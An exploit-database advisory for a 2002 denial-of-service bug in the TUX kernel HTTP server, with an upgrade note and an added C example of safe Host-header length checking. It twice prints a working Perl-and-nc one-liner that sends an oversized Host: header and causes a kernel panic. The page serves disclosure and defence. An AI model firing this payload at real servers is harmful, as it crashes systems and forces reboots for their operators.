Vendor: TUX
By: SecurityFocus
CVSS: 7.2 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: TUX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:tux_http_server_project:tux
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

TUX Kernel Panic

An error exists when the TUX daemon receives an oversized Host: header as part of an HTTP request. The request results in an assertion failure and eventually in a kernel panic, after which a system reboot is required to regain normal functionality. The issue is triggered by an HTTP request carrying an oversized Host header, as in the following command:

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> <dest_port>

Mitigation:

Upgrade to the latest version of TUX to mitigate this vulnerability.
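
The defensive counterpart to the failure described above, as an added example (not TUX's code and not the vendor's patch): an oversized Host: value is handled as an ordinary input error and reported with a status code the caller can turn into a 400 response, instead of reaching an assertion. The 255-byte cap, `extract_host`, `is_host_line` and the status names are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_HOST_LEN 255 /* assumed cap: a DNS name is at most 253 chars */
enum host_status { HOST_OK, HOST_MISSING, HOST_TOO_LONG };

/* Case-insensitive check that a header line starts with "host:". */
static int is_host_line(const char *p, size_t len)
{
    if (len < 5) return 0;
    for (size_t i = 0; i < 5; i++)
        if (tolower((unsigned char)p[i]) != "host:"[i]) return 0;
    return 1;
}

/* Copy the Host value from a raw request into out. An oversized value is
 * an expected input error: return a code (caller answers 400), never assert. */
enum host_status extract_host(const char *req, size_t req_len,
                              char *out, size_t out_size)
{
    const char *p = req, *end = req + req_len;
    while (p < end) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        size_t len = eol ? (size_t)(eol - p) : (size_t)(end - p);
        if (len == 0 || (len == 1 && *p == '\r')) break; /* end of headers */
        if (is_host_line(p, len)) {
            const char *v = p + 5, *ve = p + len;
            while (v < ve && (*v == ' ' || *v == '\t')) v++;
            while (ve > v && (ve[-1] == '\r' || ve[-1] == ' ')) ve--;
            size_t vlen = (size_t)(ve - v);
            if (vlen > MAX_HOST_LEN || vlen >= out_size) return HOST_TOO_LONG;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return HOST_OK;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return HOST_MISSING;
}

int main(void)
{
    const char req[] = "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n"; /* constructed */
    char host[MAX_HOST_LEN + 1];
    enum host_status st = extract_host(req, sizeof req - 1, host, sizeof host);
    printf("status=%d host=%s\n", (int)st, st == HOST_OK ? host : "-");
    return 0;
}
```

The length test runs before any copy, and both the policy limit and the destination size are checked, so a caller that passes a smaller buffer still gets `HOST_TOO_LONG` rather than a truncated or overrun copy.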
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3506/info

TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon receives an oversized Host: header as part of an HTTP request. The request will result in an assertion failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality.

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>